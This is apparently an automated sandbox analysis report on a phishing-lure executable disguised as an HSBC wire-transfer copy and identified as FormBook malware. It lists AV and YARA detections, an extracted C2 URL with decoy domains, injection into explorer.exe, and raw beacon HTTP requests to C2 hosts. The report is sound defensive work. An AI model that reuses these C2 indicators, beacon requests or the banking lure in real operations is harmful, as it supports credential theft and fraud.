Windows Analysis Report HSBC ... Wire Transfer Copy.exe

AV Detection:

Found malware configuration

Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.atlantiscompania.com/m4n8/"], "decoy": ["loganvineyard.com", "seanna-charters.com", "ironbandfitness.com", "centuriesandsleuthsreviews.com", "saminicky2022.com", "oscarlorenzo.online", "donaldlittlelaw.com", "internetbook.net", "dailyhealthyfood.com", "kostarelosdair.com", "baodingtangyang.com", "cumberlndfarms.com", "dylanmellor.xyz", "investwithelsa.com", "dermaaesthetika.com", "shoelife864.com", "nightcosex.biz", "greauxbooks.com", "artwithnumber.com", "hyggestudio.store", "vektor-pro.com", "bookextraevents.com", "poweredsky.store", "carver150.com", "greenfleetshippingco.com", "raise-ryokwpl.xyz", "lobbiru.com", "tilcep.xyz", "frist-universe.com", "thehumanityleague.com", "zz4321.com", "rightpowereletricalservices.com", "alainasdesigns.com", "getcardanocoin.com", "wattnow.biz", "nitromaxfmx.com", "rty161578.top", "danielthan.com", "devjmccormick.com", "clearwaterwaverunners.com", "onlineames.com", "pureproducts.xyz", "yoothdirect.info", "tryprovo.com", "mkuu88888.xyz", "fibers2you.com", "urdnauha.xyz", "andfme.com", "shopkoman.com", "civico46bcn.com", "top-online-fashion-24.com", "lakshimechatronicssystems.com", "cortezphoto.com", "samallondemolitonyorkshire.com", "uang.exchange", "gonderipaylasim.net", "piramsgprodiet.store", "parasmountplus.com", "sifangav.net", "gramaltinrafineri.com", "kvb5676.com", "atomhome.xyz", "catproductreviews.com", "frenchieaday.com"]}

Multi AV Scanner detection for submitted file

Source: HSBC ... Wire Transfer Copy.exe	Virustotal: Detection: 16%			Perma Link
Source: HSBC ... Wire Transfer Copy.exe	ReversingLabs: Detection: 40%

Yara detected FormBook

Source: Yara match	File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY

Antivirus or Machine Learning detection for unpacked file

Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: HSBC ... Wire Transfer Copy.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: HSBC ... Wire Transfer Copy.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: ipconfig.pdb source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: HSBC ... Wire Transfer Copy.exe, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 4x nop then pop edi		6_2_0040E477
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop edi		16_2_02C6E477

Networking:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 172.217.168.83 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.gramaltinrafineri.com
Source: C:\Windows\explorer.exe	Domain query: www.catproductreviews.com
Source: C:\Windows\explorer.exe	Domain query: www.piramsgprodiet.store
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.atlantiscompania.com/m4n8/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+ HTTP/1.1Host: www.piramsgprodiet.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo HTTP/1.1Host: www.gramaltinrafineri.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 HTTP/1.1Host: www.catproductreviews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 17:58:23 GMTContent-Type: text/htmlContent-Length: 275ETag: "61973ffe-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 17:58:43 GMTContent-Type: text/htmlContent-Length: 275ETag: "61973ffe-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

URLs found in memory or binary data

Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ipconfig.exe, 00000010.00000002.551598331.000000000403F000.00000004.00020000.sdmp	String found in binary or memory: https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNH

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.piramsgprodiet.store

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+ HTTP/1.1Host: www.piramsgprodiet.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo HTTP/1.1Host: www.gramaltinrafineri.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 HTTP/1.1Host: www.catproductreviews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Uses 32bit PE files

Source: HSBC ... Wire Transfer Copy.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
